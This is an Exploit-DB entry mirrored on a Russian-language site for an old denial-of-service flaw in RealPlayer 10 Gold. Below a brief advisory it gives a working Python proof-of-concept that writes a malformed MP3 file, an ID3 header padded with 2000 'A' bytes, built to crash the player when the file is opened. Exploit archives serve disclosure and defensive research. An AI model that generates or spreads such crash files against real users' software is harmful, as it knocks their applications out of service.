- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 32956
- Проверка EDB
-
- Пройдено
- Автор
- ABDUL-AZIZ HARIRI
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- N/A
- Дата публикации
- 2009-04-27
Код:
source: https://www.securityfocus.com/bid/34719/info
RealNetworks RealPlayer is prone to a remote denial-of-service vulnerability because the application fails to handle specially crafted files.
Exploiting this issue allows remote attackers to crash the application, denying further service to legitimate users.
RealPlayer 10 Gold is vulnerable; other versions may also be affected.
#!/usr/bin/python
import sys,os
#RealPlayer MP3 DoS PoC by AbdulAziz Hariri - [email protected]
mp3_file =
("\x49\x44\x33\x00\x00\x00\x00\x00\x09\x07\x41\x41\x41\x41\x00\x00\x00\x08\x00\x00\x00"+
"\x50\x69\x73\x74\x65\x20\x35\x54\x50\x45\x31\x00\x00\x00\x05\x00\x00\x00\x41\x6e"+
"\x69\x73\x54\x41\x4c\x42\x00\x00\x00\x0d\x00\x00\x00\x41\x41\x41\x41"+
"\x44\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+ "\x41"*2000)
try:
f = open("foo.mp3","w")
try:
f.write(mp3_file)
finally:
f.close()
except IOError:
pass
print "[x] Try loading foo.mp3"- Источник
- www.exploit-db.com
